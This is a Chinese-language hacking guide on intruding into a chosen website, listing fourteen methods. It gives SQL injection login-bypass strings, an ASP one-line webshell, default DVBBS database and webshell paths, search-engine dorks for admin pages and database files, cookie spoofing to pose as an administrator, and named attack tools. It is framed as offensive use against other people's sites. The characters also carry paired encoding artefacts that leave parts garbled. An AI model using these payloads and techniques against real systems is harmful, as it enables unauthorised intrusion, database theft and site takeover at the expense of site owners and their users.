首先，觀察指定網(wǎng)站。

入侵指定網(wǎng)站是需要條件的：

要先觀察這個(gè)網(wǎng)站是動(dòng)態(tài)還是靜態(tài)的。

首先介紹下什么樣站點(diǎn)可以入侵：我認(rèn)為必須是動(dòng)態(tài)的網(wǎng)站如ASP、PHP、JSP等代碼編寫(xiě)的站點(diǎn)如果是靜態(tài)的（.htm或html）,一般是不會(huì)成功的。

如果要入侵的目標(biāo)網(wǎng)站是動(dòng)態(tài)的，就可以利用動(dòng)態(tài)網(wǎng)站的漏洞進(jìn)行入侵。

Quote: 

以下是入侵網(wǎng)站常用方法：

1.上傳漏洞

如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請(qǐng)登陸后使用”，80%就有漏洞了！

有時(shí)上傳不一定會(huì)成功,這是因?yàn)镃ookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.

2.注入漏洞

字符過(guò)濾不嚴(yán)造成的

3.暴庫(kù):把二級(jí)目錄中間的/換成%5c

4.'or'='or'這是一個(gè)可以連接SQL的語(yǔ)名句.可以直接進(jìn)入后臺(tái)。

我收集了一下。類似的還有：

'or''='
" or "a"="a 
 ') or ('a'='a 
 ") or ("a"="a 
 or 1=1--
 ' or 'a'='a

5.社會(huì)工程學(xué)。這個(gè)我們都知道吧。就是猜解。 

6.寫(xiě)入 ASP 格式數(shù)據(jù)庫(kù)。就是一句話木馬〈%execute request("value")%〉 （數(shù)據(jù)庫(kù)必需得是 ASP 或 ASA

的后綴）

7.源碼利用：一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(zhǎng)很懶.什么也不改.

比如：默認(rèn)數(shù)據(jù)庫(kù)，默認(rèn)后臺(tái)地址，默認(rèn)管理員帳號(hào)密碼等

8.默認(rèn)數(shù)據(jù)庫(kù)/webshell 路徑利用:這樣的網(wǎng)站很多/利人別人的 WEBSHELL.

/Databackup/dvbbs7.MDB 
/bbs/Databackup/dvbbs7.MDB 
/bbs/Data/dvbbs7.MDB 
/data/dvbbs7.mdb 
/bbs/diy.asp 
/diy.asp 
/bbs/cmd.asp 
/bbs/cmd.exe 
/bbs/s-u.exe 
/bbs/servu.exe

工具：網(wǎng)站獵手 挖掘雞 明小子

9.查看目錄法:一些網(wǎng)站可以斷開(kāi)目錄，可以訪問(wèn)目錄。

210.37.95.65 images 

10.工具溢出 

11.搜索引擎利用:

inurl:flasher_list.asp
默認(rèn)數(shù)據(jù)庫(kù):database/flash.mdb
后臺(tái)/manager/

找網(wǎng)站的管理后臺(tái)地址:  

site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈關(guān)鍵字很多，自已找〉
site:xxxx.cominurl:login

查找 access 的數(shù)據(jù)庫(kù),mssql、mysql 的連接文件

allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb

12.COOKIE 詐騙：把自己的 ID 修改成管理員的，MD5 密碼也修改成他的，用桂林老兵工具可以修改 COOKIE。

13.利用常見(jiàn)的漏洞：如動(dòng)網(wǎng) BBS 

可以先用:dvbbs 權(quán)限提升工具，使自已成為前臺(tái)管理員。

THEN，運(yùn)用:動(dòng)網(wǎng)固頂貼工具，找個(gè)固頂貼，再取得 COOKIES，這個(gè)要你自已做。我們可以用 WSockExpert

取得 Cookies/NC 包 這個(gè)我就不做了，網(wǎng)上教程多的是，自已下個(gè)看看。

工具：dvbbs 權(quán)限提升工具 動(dòng)網(wǎng)固頂貼工具

14.還有一些老漏洞。如 IIS3，4 的查看源碼，

5 的 Delete CGI，PHP 的一些老洞，我就不說(shuō)了啊。。太老了。沒(méi)有什么大用途。